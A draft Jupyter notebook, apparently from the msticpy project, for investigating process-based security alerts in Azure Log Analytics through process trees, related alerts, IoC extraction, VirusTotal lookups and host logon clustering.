# Title: Alert Investigation (Process Alerts)
LogAnalytics
Version 0.3
## Description:
Series of modules designed to help get a better understanding of the contents of a process-based alert.


<a id='toc'></a>
## Table of Contents
- [Setup and Authenticate](#setup)

- [Get Alerts List](#getalertslist)
- [Choose an Alert to investigate](#enteralertid)
  - [Extract Properties and entities from alert](#extractalertproperties)
  - [Entity Graph](#entitygraph)
- [Related Alerts](#related_alerts)
- [Session Process Tree](#processtree)
  - [Process Timeline](#processtimeline)
- [Other Process on Host](#process_clustering)
- [Check for IOCs in Commandline](#cmdlineiocs)
  - [VirusTotal lookup](#virustotallookup)
- [Alert command line - Occurrence on other hosts in subscription](#cmdlineonotherhosts)
- [Host Logons](#host_logons)
  - [Alert Account](#logonaccount)
  - [Failed Logons](#failed_logons)
- [Appendices](#appendices)
  - [Saving data to Excel](#appendices)


<a id='setup'></a>[Contents](#toc)
# Setup

1. Make sure that you have installed packages specified in the setup (uncomment the lines to execute)
2. There are some manual steps up to selecting the alert ID. After this most of the notebook can be executed sequentially
3. Major sections should be executable independently (e.g. Alert Command line and Host Logons can be run skipping Session Process Tree)

## Install Packages

In [None]:
# You may needs these - should only need to uncomment and run once
# !pip install msgpack
# !pip install Kqlmagic --no-cache-dir  --upgrade

# !pip install PyHamcrest
# !conda install -c conda-forge python-levenshtein -y
# !conda install requests
# !conda install attrs
# !conda install seaborn
# !conda install bokeh
# !conda install holoviews

# our package
#!pip install ../python --upgrade


### Imports and Magic

In [None]:
# Imports
import sys
MIN_REQ_PYTHON = (3,6)
if sys.version_info < MIN_REQ_PYTHON:
    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')
    print('or later is selected as the active kernel.')
    sys.exit("Python %s.%s or later is required.\n" % MIN_REQ_PYTHON)

import numpy as np
from IPython import get_ipython
from IPython.display import display, HTML
import ipywidgets as widgets

import matplotlib.pyplot as plt
import seaborn as sns
import networkx as nx

import pandas as pd
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 50)
pd.set_option('display.max_colwidth', 100)

import os
import sys
module_path = os.path.abspath(os.path.join('..'))
if module_path not in sys.path:
    sys.path.append(module_path)
    
import msticpy.sectools as sectools
import msticpy.asitools as asi
import msticpy.asitools.kql as qry
import msticpy.asitools.nbdisplay as asidisp



### Select a Workspace

In [None]:
available_workspaces = {'Contoso77':'802d39e1-9d70-404d-832c-2de5e2478eda', 
                        'MSTICLinux':'06dc719f-5dad-47e9-b5af-07d84a0bda4e',
                        'ASIHuntOMSWorkspaceV4': '52b1ab41-869e-4138-9e40-2a4457f09bf0',
                        'ASIHuntOMSWorkspaceV5': '4ca7b24a-6e8f-4540-a8ce-1a80c2948c37',
                        'Rome ILDC - Detection E2E Tests Stage': '3eb61071-5dcd-4db3-94fa-0091a69b7359'}
select_ws = asi.SelectString(description='Select workspace :',
                             item_dict=available_workspaces)

select_ws.display()

In [None]:
LA_URL = 'https://ms.portal.azure.com/#blade/HubsExtension/Resources/resourceType/Microsoft.OperationalInsights%2Fworkspaces'
help_str=f'To find your workspace Id go to <a href={LA_URL}>Log Analytics</a> and look at the workspace properties.'
display(HTML(help_str))

ws_id = asi.GetEnvironmentKey(env_var='WORKSPACE_ID',
                              prompt='Log Analytics Workspace Id:')
ws_id.display()

### Authenticate to Log Analytics

In [None]:
# TODO - set WS ID from dialog
if not select_ws.value and not ws_id.value:
    raise ValueError('No workspace selected.')
WORKSPACE_ID = select_ws.value

asi.kql.load_kql_magic()
# Use the following syntax if you are authenticating using an Azure Active Directory
# AppId and Secret
# %kql loganalytics://tenant(aad_tenant).workspace(WORKSPACE_ID).clientid(reader_client_id).clientsecret(reader_client_secret)

%kql loganalytics://code().workspace(WORKSPACE_ID)


<a id='getalertslist'></a>[Contents](#toc)
# Get Alerts List

**Note**: this is a placeholder section. We need something a bit more intelligent and flexible but that possibly belongs in another notebook. The purpose here is simply to get a list of subscriptions and alerts to test out the rest of the notebook.

In [None]:
alert_q_times = asi.QueryTime(units='day', max_before=20, before=5, max_after=1)
alert_q_times.display()

In [None]:
alert_counts = qry.list_alerts_counts(provs=[alert_q_times])
alert_list = qry.list_alerts(provs=[alert_q_times])
print(len(alert_counts), ' distinct alert types')
print(len(alert_list), ' distinct alerts')
display(HTML('<h2>Top alerts</h2>'))
alert_counts.head(20)

<a id='enteralertid'></a>[Contents](#toc)
# Choose Alert to Investigate
(copy ProviderAlertId from list above (or somewhere else) and paste into text box)

### Select alert from list

In [None]:
alert_select = asi.AlertSelector(alerts=alert_list, action=asidisp.display_alert)
alert_select.display()

### Or paste in an alert ID and fetch it
**Skip this if you selected from the above list**

In [None]:
# Allow alert to be selected
# Allow subscription to be selected
get_alert = asi.GetSingleAlert(action=asidisp.display_alert)
get_alert.display()

<a id='extractalertproperties'></a>[Contents](#toc)
## Extract properties and entities from Alert

In [None]:
# Extract entities and properties into a SecurityAlert class
if alert_select.selected_alert is None:
    sys.exit("Please select an alert before executing remaining cells.")

security_alert = asi.SecurityAlert(alert_select.selected_alert)
asi.disp.display_alert(security_alert, show_entities=True)

<a id='entitygraph'></a>[Contents](#toc)
## Entity Graph

### Plot using Networkx/Matplotlib

In [None]:
# Draw the graph using Networkx/Matplotlib
%matplotlib notebook
alertentity_graph = asi.create_alert_graph(security_alert)
asidisp.draw_alert_entity_graph(alertentity_graph)

In [None]:
# from pyvis.network import Network
# import math
# # import networkx as nx
# # G = Network()
# # G.from_nx(alertentity_graph)
# import holoviews as hv
# hv.extension('bokeh')
# %opts Graph [width=900 height=900]

# %opts Graph [color_index='circle']
# %opts Graph (node_size=20 edge_line_width=1)
# %opts Graph [tools=['wheel_zoom', 'hover']]
# padding = dict(x=(-1.2, 1.2), y=(-1.2, 1.2))

# n_nodes = len(alertentity_graph.nodes)
# k = 1 / (math.sqrt(n_nodes))

# # hv_graph = hv.Graph.from_networkx(nx_graph, nx.layout.spring_layout, k=k).redim.range(**padding)
# hv_graph = hv.Graph.from_networkx(alertentity_graph, nx.layout.spring_layout, k=k).redim.range(**padding)
# labels = hv.Labels(
#         {('x', 'y'): hv_graph.nodes.array([0, 1]), 'text': hv_graph.nodes.data['name']}, ## 'label' can be an array: has to be correct size!
#         ['x', 'y'], 
#         'text').options(fontsize=8, cmap='viridis', yoffset=0.05)
# hv_graph*labels

<a id='related_alerts'></a>[Contents](#toc)
# Related Alerts
### For entities in the investigated alert

In [None]:
# set the origin time to the time of our alert
query_times = asi.QueryTime(units='day', origin_time=security_alert.TimeGenerated, 
                            max_before=28, max_after=1, before=5)
query_times.display()

In [None]:
related_alerts = qry.list_related_alerts(provs=[query_times, security_alert])

host_alert_items = related_alerts\
    .query('host_match == @True')[['AlertType', 'StartTimeUtc']]\
    .groupby('AlertType').StartTimeUtc.agg('count').to_dict()
acct_alert_items = related_alerts\
    .query('acct_match == @True')[['AlertType', 'StartTimeUtc']]\
    .groupby('AlertType').StartTimeUtc.agg('count').to_dict()
proc_alert_items = related_alerts\
    .query('proc_match == @True')[['AlertType', 'StartTimeUtc']]\
    .groupby('AlertType').StartTimeUtc.agg('count').to_dict()

def print_related_alerts(alertDict, entityType, entityName):
    if len(alertDict) > 0:
        print('Found {} different alert types related to this {} (\'{}\')'.format(len(alertDict), entityType, entityName))
        for (k,v) in alertDict.items():
            print('    {}, Count of alerts: {}'.format(k, v))
    else:
        print('No alerts for {} entity \'{}\''.format(entityType, entityName))
        
print_related_alerts(host_alert_items, 'host', security_alert.hostname)
print_related_alerts(acct_alert_items, 'account', 
                     security_alert.primary_account.qualified_name if security_alert.primary_account
                     else None)
print_related_alerts(proc_alert_items, 'process', 
                     security_alert.primary_process.ProcessFilePath if security_alert.primary_process
                     else None)

In [None]:
# Draw a graph of this (add to entity graph)
%matplotlib notebook
%matplotlib notebook

print('This can be unreadable with a lot of alerts. Use the matplotlib interactive zoom')
print('Control to zoom in to part of the graph')
rel_alert_graph = asi.add_related_alerts(related_alerts=related_alerts,
                                         alertgraph=alertentity_graph)
asidisp.draw_alert_entity_graph(rel_alert_graph)

### Browse List of Related Alerts
Select an Alert to view details

In [None]:
related_alerts['CompromisedEntity'] = related_alerts['Computer']

def disp_full_alert(alert):
    global related_alert
    related_alert = asi.SecurityAlert(alert)
    asidisp.display_alert(related_alert, show_entities=True)

print('Selected alert is available as \'related_alert\' variable.')
rel_alert_select = asi.AlertSelector(alerts=related_alerts, action=disp_full_alert)
rel_alert_select.display()


<a id='processtree'></a>[Contents](#toc)
# Get Process Tree

## Set time boundaries for query

In [None]:
# set the origin time to the time of our alert
query_times = asi.QueryTime(units='minute', origin_time=security_alert.origin_time)
query_times.display()

**!!! Note - potentially long running query**

In [None]:
if security_alert.primary_process and security_alert.primary_process.ProcessId:
    process_tree = qry.get_process_tree(provs=[query_times, security_alert])

    # Print out the text view of the process tree
    asidisp.display_process_tree(process_tree)
else:
    print('This alert has no process entity. See later in the notebook to retrieve all processes')


<a id='processtimeline'></a>[Contents](#toc)
## Process TimeLine

In [None]:
# Show timeline of events
asidisp.display_timeline(data=process_tree, alert=security_alert, title='Alert Process Session')

<a id='process_clustering'></a>[Contents](#toc)
# Other Processes on Host - Clustering
This section retrieves all processes on the host within the time bounds
set earlier.
We then process the output to extract a few features that model strings
(such as commandline) into numerics scores based on delimiter patters.
Finally we run a clustering algorithm on the process list that groups
similar (noisy) processes together and leaves unique process patterns
as single-member clusters.

In [None]:
from msticpy.sectools.eventcluster import dbcluster_events, add_process_features

processes_on_host = qry.list_processes(provs=[query_times, security_alert])
feature_procs = add_process_features(input_frame=processes_on_host,
                                     path_separator=security_alert.path_separator)


# you might need to play around with the max_cluster_distance parameter.
# decreasing this gives more clusters.
(clus_events, _, _) = dbcluster_events(data=feature_procs,
                                       cluster_columns=['commandlineTokensFull', 
                                                        'pathScore', 
                                                        'isSystemSession'],
                                                         max_cluster_distance=0.0001)
print('Number of input events:', len(feature_procs))
print('Number of clustered events:', len(clus_events))
clus_events.sort_values('TimeGenerated')

In [None]:
# Show timeline of events - all events
asidisp.display_timeline(data=processes_on_host, alert=security_alert, title='All Host Processes')

In [None]:
# Show timeline of events - clustered events
asidisp.display_timeline(data=clus_events, alert=security_alert, title='Distinct Host Processes')

<a id='cmdlineiocs'></a>[Contents](#toc)
# Check for IOCs in Commandline

In [None]:
process = security_alert.primary_process
ioc_extractor = sectools.IoCExtract()

if process:
    # if nothing is decoded this just returns the input string unchanged
    base64_dec_str, _ = sectools.b64.unpack_items(input_string=process["CommandLine"])
    if base64_dec_str and '<decoded' in base64_dec_str:
        print('Base64 encoded items found.')
        print(base64_dec_str)
        
    # any IoCs in the string?
    iocs_found = ioc_extractor.extract(base64_dec_str)
    
    if iocs_found:
        print('\nPotential IoCs found in alert process:')
        display(iocs_found)
else:
    print('Nothing to process')


In [None]:
ioc_extractor = sectools.IoCExtract()
ioc_df = ioc_extractor.extract(data=process_tree, columns=['CommandLine'], os_family=security_alert.os_family)
if len(ioc_df):
    display(HTML("<h3>IoC patterns found in process tree.</h3>"))
    display(ioc_df)

In [None]:
dec_df = sectools.b64.unpack_items(data=process_tree, column='CommandLine')
if len(dec_df) > 0:
    display(HTML("<h3>Decoded base 64 command lines</h3>"))
    display(HTML("Warning - some binary patterns may be decodable as unicode strings"))
    display(dec_df[['original_string', 'decoded_string', 'input_bytes', 'file_hashes']])

    ioc_dec_df = ioc_extractor.extract(data=dec_df, columns=['full_decoded_string'])
    if len(ioc_dec_df):
        display(HTML("<h3>IoC patterns found in base 64 decoded data</h3>"))
        display(ioc_dec_df)
        ioc_df = ioc_df.append(ioc_dec_df ,ignore_index=True)
else:
    print("No base64 encodings found.")

<a id='virustotallookup'></a>[Contents](#toc)
## Virus Total Lookup

In [None]:
vt_key = asi.GetEnvironmentKey(env_var='VT_API_KEY',
                           help_str='To obtain an API key sign up here https://www.virustotal.com/',
                           prompt='Virus Total API key:')
vt_key.display()

In [None]:
if vt_key.value:
    vt_lookup = sectools.VTLookup(vt_key.value, verbosity=2)

    print(f'{len(ioc_df)} items in input frame')
    supported_counts = {}
    for ioc_type in vt_lookup.supported_ioc_types:
        supported_counts[ioc_type] = len(ioc_df[ioc_df['IoCType'] == ioc_type])
    print('Items in each category to be submitted to VirusTotal')
    print('(Note: items have pre-filtering to remove obvious erroneous '
          'data and false positives, such as private IPaddresses)')
    print(supported_counts)
    print('-' * 80)
    vt_results = vt_lookup.lookup_iocs(data=ioc_df, type_col='IoCType', src_col='Observable')
    display(vt_results)

<a id='cmdlineonotherhosts'></a>[Contents](#toc)
# Alert command line - Occurrence on other hosts in workspace

In [None]:
# set the origin time to the time of our alert
query_times = asi.QueryTime(units='day', before=5, max_before=20,
                            after=1, max_after=10,
                            origin_time=security_alert.origin_time)
query_times.display()

In [None]:
# Find the query to use
qry.list_queries()

In [None]:
# What does the query look like?
qry.query_help('list_hosts_matching_commandline')

In [None]:
# This query needs a commandline parameter which isn't supplied
# by default from the the alert 
# - so extract and escape this from the process
commandline = security_alert.primary_process.CommandLine
commandline = asi.utility.escape_windows_path(commandline)
#commandline = commandline.replace('\'', '\\\'')
proc_match_in_ws = qry.list_hosts_matching_commandline(provs=[query_times, security_alert],
                                                                commandline=commandline)

# Check the results
if proc_match_in_ws is None or len(proc_match_in_ws) == 0:
    print('No proceses with matching commandline found in on other hosts in workspace')
    print('between', query_times.start, 'and', query_times.end)
else:
    hosts = proc_match_in_ws['Computer'].drop_duplicates().shape[0]
    processes = proc_match_in_ws.shape[0]
    print('{numprocesses} proceses with matching commandline found on {numhosts} hosts in workspace'\
         .format(numprocesses=processes, numhosts=hosts))
    print('between', query_times.start, 'and', query_times.end)
    print('To examine these execute the dataframe \'{}\' in a new cell'.format('proc_match_in_ws'))
    print(proc_match_in_ws[['TimeCreatedUtc','Computer', 'NewProcessName', 'CommandLine']].head())
    

<a id='host_logons'></a>[Contents](#toc)
# Host Logons

<a id='logonaccount'></a>[Contents](#toc)
## Alert Logon Account

In [None]:
# set the origin time to the time of our alert
query_times = asi.QueryTime(units='day', origin_time=security_alert.origin_time,
                           before=5, after=0, max_before=20, max_after=1)
query_times.display()

In [None]:
if security_alert.primary_account:
    logon_event = qry.get_host_logon(provs=[query_times, security_alert])
    asidisp.display_logon_data(logon_event, security_alert)
else:
    print('No account entity in the source alert.')

In [None]:
host_logons = qry.list_host_logons(provs=[query_times, security_alert])

In [None]:
from msticpy.sectools.eventcluster import dbcluster_events, add_process_features, _string_score

if len(host_logons) > 0:
    logon_features = host_logons.copy()
    logon_features['AccountNum'] = host_logons.apply(lambda x: _string_score(x.Account), axis=1)
    logon_features['LogonHour'] = host_logons.apply(lambda x: x.TimeGenerated.hour, axis=1)

    # you might need to play around with the max_cluster_distance parameter.
    # decreasing this gives more clusters.
    (clus_logons, _, _) = dbcluster_events(data=logon_features, time_column='TimeGenerated',
                                           cluster_columns=['AccountNum',
                                                            'LogonType'],
                                                             max_cluster_distance=0.0001)
    print('Number of input events:', len(host_logons))
    print('Number of clustered events:', len(clus_logons))
    print('\nDistinct host logon patterns:')
    clus_logons.sort_values('TimeGenerated')
else:
    print('No logon events found for host.')

In [None]:
# Display logon details
asidisp.display_logon_data(clus_logons, security_alert)

In [None]:
# Show timeline of events - all events
asidisp.display_timeline(data=host_logons, 
                         alert=security_alert, 
                         source_columns=['Account', 'LogonType'],
                         title='All Host Logons')

In [None]:
# Counts of Logon types by Account
host_logons[['Account', 'LogonType', 'TimeGenerated']].groupby(['Account','LogonType']).count()

<a id='failed logons'></a>[Contents](#toc)
## Failed Logons

In [None]:
failedLogons = qry.list_host_logon_failures(provs=[query_times, security_alert])
if failedLogons.shape[0] == 0:
    display(print('No logon failures recorded for this host between {security_alert.start} and {security_alert.start}'))

failedLogons

<a id='appendices'></a>[Contents](#toc)
# Appendices

## Available DataFrames

In [None]:
print('List of current DataFrames in Notebook')
print('-' * 50)
current_vars = list(locals().keys())
for var_name in current_vars:
    if isinstance(locals()[var_name], pd.DataFrame) and not var_name.startswith('_'):
        print(var_name)

## Saving Data to Excel
To save the contents of a pandas DataFrame to an Excel spreadsheet
use the following syntax
```
writer = pd.ExcelWriter('myWorksheet.xlsx')
my_data_frame.to_excel(writer,'Sheet1')
writer.save()
```